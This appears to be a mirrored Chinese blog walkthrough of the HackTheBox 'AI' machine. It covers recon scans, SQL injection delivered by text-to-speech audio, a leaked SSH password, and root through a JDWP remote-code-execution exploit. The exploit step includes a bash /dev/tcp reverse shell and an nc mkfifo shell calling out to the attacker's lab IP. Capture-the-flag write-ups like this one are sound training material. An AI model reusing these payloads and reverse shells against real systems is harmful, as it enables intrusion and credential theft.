0

hackthebox AI | Wh0ale's Blog

 4 months ago
source link: https://wh0ale.github.io/2020/02/01/hackthebox-AI/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

recon

nmap -sV -sT -sC -o nmapinitial ai.htb

masscan

masscan -p1-65535 10.10.10.163 --rate=1000 -e eth0

nmap实在太慢了,使用masscan发现开放了2280端口

gobuster 扫描网站路径

gobuster dir -u http://ai.htb/ -w /usr/share/wordlists/dirb/common.txt -x php

发现存在http://ai.htb/intelligence.php

从下图可以发现ai.pgp存在上传的页面

intelligence.php有一些使用其语音识别的说明

exploit

ffmpeg

使用ttsmp3.com生成音频文件,并创建了一个测试文件:

ffmpeg -i ttsMP3.com_VoiceText_2020-2-3_11_23_15.mp3 ttsMP3.com_VoiceText_2020-2-3_11_23_15.wav

上传显示创建的测试文件内容

这种方法有点麻烦,我们可以采用另一种方法

apt install apt-file
apt-file update
apt-file search text2wave
apt-get install festival //一步到位

然后生成wav文件

echo "test" | text2wave -o test.wav

尝试单引号注入

ffmpeg -i ttsMP3.com_VoiceText_2020-2-3_12_25_27.mp3 ttsMP3.com_VoiceText_2020-2-3_12_25_27.wav
Our understanding of your input is : it's a test
Query result : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 's a test'' at line 1

题目考察的是通过AI的解析出来的语句构造sql注入

这里实在想不懂,就直接从writeup摘抄下来了

payload:注入数据库

one open single quote union select database open parenthesis close parenthesis comment database
echo "one open single quote union select database open parenthesis close parenthesis comment database" | text2wave -o test.wav
Our understanding of your input is : 1'union select database()-- -
Query result : alexa

数据库名称是alexa,接下来我要做的是枚举表名,

payload

one open single quote union select test from test comment database
echo "one open single quote union select test from test comment database" | text2wave -o test.wav
Our understanding of your input is : 1'union select test from test -- -
Query result : Table 'alexa.test' doesn't exist

payload

one open single quote union select test from users comment database
Our understanding of your input is : 1'union select test from users -- -
Query result : Unknown column 'test' in 'field list'

存在user表

payload

one open single quote union select username from users comment database

得到响应,没有

Our understanding of your input is : 1'union select user name from users -- -
Query result : Unknown column 'user' in 'field list'

payload

one open single quote union select password from users comment database

爆出password列的数据

Our understanding of your input is : 1'union select password from users -- -
Query result : H,Sq9t6}a<)?q93_

SSH as alexa

ssh [email protected]
password:H,Sq9t6}a<)?q93_
[email protected]:~$ ls
user.txt
[email protected]:~$ cat user.txt
c43b62c682a8c*******d4a2cda55e4b

Elevation

[email protected]:~$ ps aux | grep java
root 38409 17.6 5.6 3137572 113460 ? Sl 08:56 0:03 /usr/bin/java -Djava.util.logging.config.file=/opt/apache-tomcat-9.0.27/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djdk.tls.ephemeralDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources -Dorg.apache.catalina.security.SecurityListener.UMASK=0027 -agentlib:jdwp=transport=dt_socket,address=localhost:8000,server=y,suspend=n -Dignore.endorsed.dirs= -classpath /opt/apache-tomcat-9.0.27/bin/bootstrap.jar:/opt/apache-tomcat-9.0.27/bin/tomcat-juli.jar -Dcatalina.base=/opt/apache-tomcat-9.0.27 -Dcatalina.home=/opt/apache-tomcat-9.0.27 -Djava.io.tmpdir=/opt/apache-tomcat-9.0.27/temp org.apache.catalina.startup.Bootstrap start

查看开放端口8000,8080,8005,8009

[email protected]:~$ netstat -ntlp
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8000 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp6 0 0 127.0.0.1:8080 :::* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 127.0.0.1:8005 :::* LISTEN -
tcp6 0 0 127.0.0.1:8009 :::* LISTEN -

通过再次查看该过程,我们还可以看到为java二进制文件提供了以下参数:

-agentlib:jdwp=transport=dt_socket,address=localhost:8000

我搜索了该jdwp服务的漏洞利用程序,然后发现了这个漏洞利用程序。我在alexa上传了python脚本,然后将反向shell有效负载添加到文件中,pwned.sh然后调用它,然后运行漏洞利用程序:

~/Desktop/Hackthebox/AI/pwn/jdwp-shellifier(master) # searchsploit jdwp         
------------------------------------------------- ------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------------- ------------------------------------
Java Debug Wire Protocol (JDWP) - Remote Code Ex | exploits/java/remote/46501.py

上传脚本pwned.sh还有jdwp-shellifier

scp -r pwned.sh [email protected]:/home/alexa //输入密码即可上传道指定的目录
[email protected]:~/pwn/jdwp-shellifier$ cat /home/alexa/pwned.sh
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.23/1337 0>&1
//本来使用rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.23 1337 >/tmp/f这条命令的一直无法反弹shell
python jdwp-shellifier.py -t 127.0.0.1 --cmd /home/alexa/pwned.sh

然后kali重新连接一个ssh

nc localhost 8005

成功 拿到root权限

在家的宽带非常垃圾,做一些扫描测试的时候经常Timeoout

Reference:

Hacking the Java Debug Wire Protocol – or – “How I met your Java debugger”


About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK